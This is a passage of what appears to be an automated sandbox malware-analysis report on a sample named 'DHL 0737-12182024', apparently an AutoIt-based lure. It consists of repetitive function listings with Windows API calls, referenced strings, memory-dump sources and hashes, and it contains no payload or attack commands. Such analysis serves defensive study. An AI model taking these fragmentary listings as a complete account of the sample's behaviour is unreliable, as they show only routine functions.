                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                            • String ID: ComboBox$ListBox
                                                                                            • API String ID: 624084870-1403004172
                                                                                            • Opcode ID: 8175e6f196900c4a6ee777c7e585b36f0e7a9633e49dfe35fc406be709e4d147
                                                                                            • Instruction ID: 3e404fd1ba2e892d714534d059b90cbe2b17d841c75d0bb84faf8215047ba802
                                                                                            • Opcode Fuzzy Hash: 8175e6f196900c4a6ee777c7e585b36f0e7a9633e49dfe35fc406be709e4d147
                                                                                            • Instruction Fuzzy Hash: 9701D4B5A8011866CF04FB94DA559FF73ADFB12340F140029E456E3281EE209B0987B2
                                                                                            Function 00881C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                              • Part of subcall function 00883CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00883CCA
                                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00881CC8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                            • String ID: ComboBox$ListBox
                                                                                            • API String ID: 624084870-1403004172
                                                                                            • Opcode ID: f0b27b5b81d41c5d5e1ae967e6a105b089a5aef492f6072aa85ed7e60d58a934
                                                                                            • Instruction ID: f9c9d4ed807a2474724b3a275555bcfc7c809f120ff06c5e7aee524e63e1f9c8
                                                                                            • Opcode Fuzzy Hash: f0b27b5b81d41c5d5e1ae967e6a105b089a5aef492f6072aa85ed7e60d58a934
                                                                                            • Instruction Fuzzy Hash: 2E01A2B5A8011867CF14FBA9DA15AFE73ADFB12340F140025B842F3282EE609F098772
                                                                                            Function 00881D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                              • Part of subcall function 00883CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00883CCA
                                                                                            • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00881DD3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                            • String ID: ComboBox$ListBox
                                                                                            • API String ID: 624084870-1403004172
                                                                                            • Opcode ID: 8872d9dc27bc1b59b7cdcabafcecd688239d80b40bf30d96c6b1784905a121ac
                                                                                            • Instruction ID: 46ed2eebe5d8dc1c7c4280d06c42bc6119e8a7c591d43494cfbfc664b8054715
                                                                                            • Opcode Fuzzy Hash: 8872d9dc27bc1b59b7cdcabafcecd688239d80b40bf30d96c6b1784905a121ac
                                                                                            • Instruction Fuzzy Hash: 0EF0A4B1A4122867DB04F7A8DD56FFE776CFB02754F040929F862E32C2DE605A098361
                                                                                            Function 008A747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen
                                                                                            • String ID: 3, 3, 16, 1
                                                                                            • API String ID: 176396367-3042988571
                                                                                            • Opcode ID: b5470d66c2f3b57e0382fde06b86386a9c155be9882352de3a85efc2b4fd1353
                                                                                            • Instruction ID: 0ac09dc48ea09b80e603cffed52da8084071a1521be2f81a3bd59c1a7711c9b7
                                                                                            • Opcode Fuzzy Hash: b5470d66c2f3b57e0382fde06b86386a9c155be9882352de3a85efc2b4fd1353
                                                                                            • Instruction Fuzzy Hash: 9AE02B0221622010E231127E9CC1A7F5F8DFFCF750710282BFA81C2276EE948D92B3A6
                                                                                            Function 00880B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00880B23
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message
                                                                                            • String ID: AutoIt$Error allocating memory.
                                                                                            • API String ID: 2030045667-4017498283
                                                                                            • Opcode ID: 77cad1ddcd12d2ba0a2cd39b79395add90f419bfe06e6a4be6553818e2b77584
                                                                                            • Instruction ID: d91b28166b0bd6b495e3ba78a487e4400069b8f9889806d0735f5d9e15f68380
                                                                                            • Opcode Fuzzy Hash: 77cad1ddcd12d2ba0a2cd39b79395add90f419bfe06e6a4be6553818e2b77584
                                                                                            • Instruction Fuzzy Hash: AAE048322843582BD21436997C07FC9BF84FF05B65F100426FB98D96D38AE1649056EA
                                                                                            Function 00840D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0083F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00840D71,?,?,?,0082100A), ref: 0083F7CE
                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,0082100A), ref: 00840D75
                                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0082100A), ref: 00840D84
                                                                                            Strings
                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00840D7F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                            • API String ID: 55579361-631824599
                                                                                            • Opcode ID: 7911cde9b977f91601b4dcabab3c37ce19af9f86804670f50c745c7bd6c7f93a
                                                                                            • Instruction ID: d5f0e3309d52160647f70587520ad56b87147e71f048cff644b578cfd1c12a6b
                                                                                            • Opcode Fuzzy Hash: 7911cde9b977f91601b4dcabab3c37ce19af9f86804670f50c745c7bd6c7f93a
                                                                                            • Instruction Fuzzy Hash: 3DE0ED746007518BD7609FBCE8487577BE4FF04744F004A2DE696C6752DBB5E4488FA1
                                                                                            Function 0087D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: LocalTime
                                                                                            • String ID: %.3d$X64
                                                                                            • API String ID: 481472006-1077770165
                                                                                            • Opcode ID: e4e8bc8adf7b33b66f4704b0cd680829af33ee8db0099a137a4812f53ae58d14
                                                                                            • Instruction ID: 1d45eaf7ef52c448fb3b19089c05e74412217afc4fc739756251175e7971657f
                                                                                            • Opcode Fuzzy Hash: e4e8bc8adf7b33b66f4704b0cd680829af33ee8db0099a137a4812f53ae58d14
                                                                                            • Instruction Fuzzy Hash: FFD012A1C1830CEACF9096D0DC458B9B37CFF58305F90C452F90AE1046D624E50967A1
                                                                                            Function 008B2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008B232C
                                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 008B233F
                                                                                              • Part of subcall function 0088E97B: Sleep.KERNEL32 ref: 0088E9F3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                            • String ID: Shell_TrayWnd
                                                                                            • API String ID: 529655941-2988720461
                                                                                            • Opcode ID: 252f528e9ea8276b4a21d1d7d58d52d8c19681df5283bbf8c88b3d87a0dec883
                                                                                            • Instruction ID: 6e2c4fae4359e7b272907ced3782c1e27ec842b36aa068a63da3f632ac55302a
                                                                                            • Opcode Fuzzy Hash: 252f528e9ea8276b4a21d1d7d58d52d8c19681df5283bbf8c88b3d87a0dec883
                                                                                            • Instruction Fuzzy Hash: B6D0A932380300B6E2A4BB309C0FFD66B04BB10B00F004A06B295EA1D0D8E0A8018A00
                                                                                            Function 008B2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008B236C
                                                                                            • PostMessageW.USER32(00000000), ref: 008B2373
                                                                                              • Part of subcall function 0088E97B: Sleep.KERNEL32 ref: 0088E9F3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                            • String ID: Shell_TrayWnd
                                                                                            • API String ID: 529655941-2988720461
                                                                                            • Opcode ID: 2f55f05371fefa6f6ab674e97ad9003c9cc1bee8f35ebbce59ef43b0b40d5ab9
                                                                                            • Instruction ID: 6cbdbcb68faf16da463f0ef09c94f7a40fdb0a1af8595fbc952368aad6f893d7
                                                                                            • Opcode Fuzzy Hash: 2f55f05371fefa6f6ab674e97ad9003c9cc1bee8f35ebbce59ef43b0b40d5ab9
                                                                                            • Instruction Fuzzy Hash: DCD0C9323C13517AE6A4BB719C4FFD66B14BB15B10F004A16B695EA1D0D9E4A8418A54
                                                                                            Function 0085BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0085BE93
                                                                                            • GetLastError.KERNEL32 ref: 0085BEA1
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0085BEFC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1717984340-0
                                                                                            • Opcode ID: e57527599d0df0760ed90ed7262210d8a6d8a99735ba989fae5ea852463e4d53
                                                                                            • Instruction ID: 65b62f49b95b8bd6952023ff24254be5dbbce39a005a691a67ddc6c39acf0f25
                                                                                            • Opcode Fuzzy Hash: e57527599d0df0760ed90ed7262210d8a6d8a99735ba989fae5ea852463e4d53
                                                                                            • Instruction Fuzzy Hash: 0B41D43460021AAFCF218FA9CC45ABABBA5FF61312F144169FD59D71A1DF308D09CB61